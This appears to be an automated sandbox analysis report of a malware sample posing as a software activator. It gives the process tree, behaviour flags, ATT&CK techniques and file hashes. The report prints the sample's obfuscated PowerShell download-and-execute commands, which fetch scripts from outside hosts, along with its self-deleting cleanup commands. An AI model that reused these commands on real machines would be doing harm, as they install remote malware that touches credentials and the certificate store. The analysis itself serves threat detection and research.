"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Windo 1 $lp=[string][char[]]@(0x49,0x45,0x78) -replace ' ','';sal s $lp;$lz=((New-Object Net.WebClient)).DownloadString('http://bit.do/eVtV2');s $lz
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1960

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Windo 1 $zr=[string][char[]]@(0x49,0x45,0x78) -replace ' ','';sal s $zr;$jr=((New-Object Net.WebClient)).DownloadString('http://dgdfasddfs.ru/pps.ps1');s $jr
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1728

C:\Users\Public\tjso.exe
"C:\Users\Public\tjso.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1684

C:\Users\Public\tjso.exe
"C:\Users\Public\tjso.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1720

C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe
"C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe" 0
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:792

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1728

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:348

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1556

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
7⤵
PID:1668

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1376

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2060

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2228

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2408

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2584

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2708

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Dewgkwlbhkrsncbybkhtfpkb.vbs"
7⤵
- Loads dropped DLL
PID:2964

C:\Users\Admin\AppData\Local\Temp\Oggnfkemtibcinconsoleapp16.exe
"C:\Users\Admin\AppData\Local\Temp\Oggnfkemtibcinconsoleapp16.exe"
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2040

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
9⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:676

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
9⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2220

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
9⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2280

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
9⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2420

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
9⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2560

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
9⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2480

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
9⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2716

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
9⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1956

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
9⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2884

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
9⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2728

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Ddmmvlnwvosotwcisp.vbs"
9⤵
- Loads dropped DLL
PID:1180

C:\Users\Admin\AppData\Local\Temp\Hsbvhggsqlrfmuvyptooonsoleapp5.exe
"C:\Users\Admin\AppData\Local\Temp\Hsbvhggsqlrfmuvyptooonsoleapp5.exe"
10⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:900

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
11⤵
- Drops file in System32 directory
PID:2084

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
11⤵
- Drops file in System32 directory
PID:2300

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
11⤵
- Drops file in System32 directory
PID:2264

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
11⤵
- Drops file in System32 directory
PID:2512

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
11⤵
- Drops file in System32 directory
PID:1976

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
11⤵
- Drops file in System32 directory
PID:1728

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
11⤵
- Drops file in System32 directory
PID:2892

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
11⤵
- Drops file in System32 directory
PID:2952

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
11⤵
- Drops file in System32 directory
PID:2992

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
11⤵
- Drops file in System32 directory
PID:2252

C:\Users\Admin\AppData\Local\Temp\Hsbvhggsqlrfmuvyptooonsoleapp5.exe
C:\Users\Admin\AppData\Local\Temp\Hsbvhggsqlrfmuvyptooonsoleapp5.exe
11⤵
- Executes dropped EXE
PID:3064

C:\Users\Admin\AppData\Local\Temp\Hsbvhggsqlrfmuvyptooonsoleapp5.exe
C:\Users\Admin\AppData\Local\Temp\Hsbvhggsqlrfmuvyptooonsoleapp5.exe
11⤵
- Executes dropped EXE
PID:1480

C:\Users\Admin\AppData\Local\Temp\Oggnfkemtibcinconsoleapp16.exe
C:\Users\Admin\AppData\Local\Temp\Oggnfkemtibcinconsoleapp16.exe
9⤵
- Executes dropped EXE
PID:1756

C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe
C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe
7⤵
- Executes dropped EXE
PID:2984

C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe
"C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe" 0
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:488

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1488

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1772

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:280

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2028

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1992

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2096

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2260

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2440

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
7⤵
PID:2616

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2828

C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe
C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe
7⤵
- Executes dropped EXE
PID:3032

C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe
"C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe" 0
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1004

C:\Users\Admin\AppData\Local\Temp\vcxfse.exe
"C:\Users\Admin\AppData\Local\Temp\vcxfse.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1980

C:\Users\Admin\AppData\Local\Temp\vcxfse.exe
"C:\Users\Admin\AppData\Local\Temp\vcxfse.exe"
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:1792

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /pid 1792 & erase C:\Users\Admin\AppData\Local\Temp\vcxfse.exe & RD /S /Q C:\\ProgramData\\769240325002254\\* & exit
9⤵
PID:1004

C:\Windows\SysWOW64\taskkill.exe
taskkill /pid 1792
10⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1560

C:\Users\Admin\AppData\Local\Temp\cbvjns.exe
"C:\Users\Admin\AppData\Local\Temp\cbvjns.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1732

C:\Users\Admin\AppData\Local\Temp\cbvjns.exe
"C:\Users\Admin\AppData\Local\Temp\cbvjns.exe"
8⤵
- Executes dropped EXE
PID:684

C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe
"C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:1888

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe"
8⤵
PID:2732

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
9⤵
- Delays execution with timeout.exe
PID:2708

C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe
"C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe" 0
6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:520

C:\Users\Admin\AppData\Local\Temp\C0FE.tmp\UNGActivator.exe
UNGActivator.exe
3⤵
- Executes dropped EXE
PID:1724

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_10a2719f-ab19-452c-9537-375fecbe5f96
MD5
df44874327d79bd75e4264cb8dc01811

SHA1
1396b06debed65ea93c24998d244edebd3c0209d

SHA256
55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

SHA512
95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1abda922-9e0e-4200-89d0-60796083afcc
MD5
be4d72095faf84233ac17b94744f7084

SHA1
cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

SHA256
b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

SHA512
43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_32b21970-4839-4ac5-a2ad-cc925aecc47c
MD5
a725bb9fafcf91f3c6b7861a2bde6db2

SHA1
8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

SHA256
51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

SHA512
1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_60554f64-a36e-4439-8748-76f202d7cb75
MD5
02ff38ac870de39782aeee04d7b48231

SHA1
0390d39fa216c9b0ecdb38238304e518fb2b5095

SHA256
fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

SHA512
24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6ccb18ff-7a22-469e-90e7-ccc861e1432b
MD5
b6d38f250ccc9003dd70efd3b778117f

SHA1
d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

SHA256
4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

SHA512
67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7bc5ca8a-50eb-4a28-856a-31595e01418a
MD5
597009ea0430a463753e0f5b1d1a249e

SHA1
4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

SHA256
3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

SHA512
5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bd47eb21-a96b-4ccd-99d7-0d9f3f6c10b6
MD5
75a8da7754349b38d64c87c938545b1b

SHA1
5c28c257d51f1c1587e29164cc03ea880c21b417

SHA256
bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

SHA512
798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c9b427a0-6073-4eb8-9b09-f8e4712d7ab5
MD5
5e3c7184a75d42dda1a83606a45001d8

SHA1
94ca15637721d88f30eb4b6220b805c5be0360ed

SHA256
8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

SHA512
fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
f7eed2368c6cf3d4e76d94f9d8723f35

SHA1
9eb6f377d80eaa707e2ce570fedcbea25d85f44e

SHA256
72cffbcb73a555f71632e4a5d7886efe193547743bc511c9faed839c7868ad51

SHA512
383f7bf32521288f1d917bf6e4bf2d3ef3589cef4442e7d31f2bbe116aa3dc26a9206acdb2dc18e0c68890c46bb22d1711d679df24019ccf89b459d3103f7695

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
b4ca431cd858d00c03572e370f85fca7

SHA1
b9334aca6894b3bcf46a9d09b594e3fe09011315

SHA256
969761bd97b108f0ee057ba751f0baf3cd44546fa354516bf7e7f42f159bf899

SHA512
add256c6232e68c89a380a999100a1323ce6e5bec749f9cdc30544db5b53c86f49e9fe2a5a448f5c52114c56129e12623c66b4d27dff9930deed80ced075de62

Download Submit
C:\Users\Admin\AppData\Local\Temp\C0FE.tmp\UNGActivator.exe
MD5
cba6e5a64b14be06310955c9f69a3262

SHA1
f478bc12a137571dd28fe982c92b1549c5ac3248

SHA256
757bf6e3803b114551566b24ce20a675c86f8db50afbef0966a82dd7f987c960

SHA512
776e554c2f0487bb4e06a8fb9b18357d8444c074b9f0c32bfb26c8338513900635a58bc4c294aeba1a5f056f27783af760d90e9478ff0810db5368d99edefad4

Download Submit
C:\Users\Admin\AppData\Local\Temp\C0FE.tmp\UNGActivator.exe
MD5
cba6e5a64b14be06310955c9f69a3262

SHA1
f478bc12a137571dd28fe982c92b1549c5ac3248

SHA256
757bf6e3803b114551566b24ce20a675c86f8db50afbef0966a82dd7f987c960

SHA512
776e554c2f0487bb4e06a8fb9b18357d8444c074b9f0c32bfb26c8338513900635a58bc4c294aeba1a5f056f27783af760d90e9478ff0810db5368d99edefad4

Download Submit
C:\Users\Admin\AppData\Local\Temp\C0FE.tmp\a1.lnk
MD5
0637586181e23525e96771a7c145aaa7

SHA1
9720c9ac9cb90a97d548cdf0883a8f16c397821f

SHA256
0dffaa85047acc241ca76696cdd898cc55504fd5486ecd5ae006a7c64dcad55f

SHA512
d97ecf221bbdc32071edbf211f4845a665276f7432b5695b6857c2fffecb15e98fef315b7df6c5e3fb92ef0df57a4e3ad1c0335757a842d1bb3be67627d11247

Download Submit
C:\Users\Admin\AppData\Local\Temp\C0FE.tmp\a2.lnk
MD5
ecb36823ec5d80821b9ce4701fba1c37

SHA1
d3eb36d8f36af4d35f016180d5ae70d9de0d1d26

SHA256
9a0bb2589738aceeacbf239c6339da2cb8c43eb74faf4008f63e703efeba37e8

SHA512
627d780d7ac6acf0bdea1d04ed71ad15e57d63c5800fa85c23f91422ee00a9dcb439fdceaa71649f1671f3164bb42a638e7ff06701b17a1edd6e5aa9903a318a

Download Submit
C:\Users\Admin\AppData\Local\Temp\C0FE.tmp\start.bat
MD5
9f198b14c64e6ec15e04ed5cdc28581f

SHA1
acbe83a48e303e12a330d14ba89f1113a17e8d25

SHA256
0b7c4e09263f456bf1129a7f52ef5200e62f47f2c1128c63dd4afd441da7aacc

SHA512
687efbcb5a1c0f6d432add5e20641c6d2fbe13698c609eceb08f1b5c8c4ce0d57ecdf396d1709441452670c016e54b4fe38619fddadd5f375e16e28b86243c43

Download Submit
C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe
MD5
b23d6c569893579789695f3d05accbe1

SHA1
fa6b1d998500175e122de2c264869fda667bcd26

SHA256
93ddf61c1aa7c0b867ffbd579b9febdeed4b027d14f8b86d62f7da493706731c

SHA512
e816f5121406e32178afeabece8b63c4d773e183d18f705b5a884664013f0fe082830785c2c87913101c5c504a7a7ee60b9987d064c4e5624c681a3674a2e633

Download Submit
C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe
MD5
b23d6c569893579789695f3d05accbe1

SHA1
fa6b1d998500175e122de2c264869fda667bcd26

SHA256
93ddf61c1aa7c0b867ffbd579b9febdeed4b027d14f8b86d62f7da493706731c

SHA512
e816f5121406e32178afeabece8b63c4d773e183d18f705b5a884664013f0fe082830785c2c87913101c5c504a7a7ee60b9987d064c4e5624c681a3674a2e633

Download Submit
C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe
MD5
be1aaef37143496d75cb83643ff63f8c

SHA1
849a5bfbfdc16cad6c10edbaadcc4bad71756620

SHA256
b594ae37dfb90a402bda0803680b455ababcc67e1add26f3c3f8f192d97dbe2a

SHA512
478d565fa97298583fc72debf544f556d0c113f51fc20ab626726dd6882401f06ba73f13772f1fed0d418c1ca4160e04b52949e82d97c189fc0848f1c6c8d737

Download Submit
C:\Users\Admin\AppData\Local\Temp\cbvjns.exe
MD5
b0ba9efb326279b8afe5e8a2656588ea

SHA1
eb42914b53580850dd56dcf6ddc80334d3bfcb45

SHA256
6950e762e655de299bce3dd06e0d7c70496e962ff41752b5741142dbedfcfba7

SHA512
cc0719e37b01b480cea20180a80af0565ffd4983ebeb68370ba87f08d56ed45dbd31dfb0355c466488938e5838e60caec2b4889f30115e3babb630d0c28e836a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cbvjns.exe
MD5
b0ba9efb326279b8afe5e8a2656588ea

SHA1
eb42914b53580850dd56dcf6ddc80334d3bfcb45

SHA256
6950e762e655de299bce3dd06e0d7c70496e962ff41752b5741142dbedfcfba7

SHA512
cc0719e37b01b480cea20180a80af0565ffd4983ebeb68370ba87f08d56ed45dbd31dfb0355c466488938e5838e60caec2b4889f30115e3babb630d0c28e836a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cbvjns.exe
MD5
b0ba9efb326279b8afe5e8a2656588ea

SHA1
eb42914b53580850dd56dcf6ddc80334d3bfcb45

SHA256
6950e762e655de299bce3dd06e0d7c70496e962ff41752b5741142dbedfcfba7

SHA512
cc0719e37b01b480cea20180a80af0565ffd4983ebeb68370ba87f08d56ed45dbd31dfb0355c466488938e5838e60caec2b4889f30115e3babb630d0c28e836a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe
MD5
be1aaef37143496d75cb83643ff63f8c

SHA1
849a5bfbfdc16cad6c10edbaadcc4bad71756620

SHA256
b594ae37dfb90a402bda0803680b455ababcc67e1add26f3c3f8f192d97dbe2a

SHA512
478d565fa97298583fc72debf544f556d0c113f51fc20ab626726dd6882401f06ba73f13772f1fed0d418c1ca4160e04b52949e82d97c189fc0848f1c6c8d737

Download Submit
C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe
MD5
be1aaef37143496d75cb83643ff63f8c

SHA1
849a5bfbfdc16cad6c10edbaadcc4bad71756620

SHA256
b594ae37dfb90a402bda0803680b455ababcc67e1add26f3c3f8f192d97dbe2a

SHA512
478d565fa97298583fc72debf544f556d0c113f51fc20ab626726dd6882401f06ba73f13772f1fed0d418c1ca4160e04b52949e82d97c189fc0848f1c6c8d737

Download Submit
C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe
MD5
be1aaef37143496d75cb83643ff63f8c

SHA1
849a5bfbfdc16cad6c10edbaadcc4bad71756620

SHA256
b594ae37dfb90a402bda0803680b455ababcc67e1add26f3c3f8f192d97dbe2a

SHA512
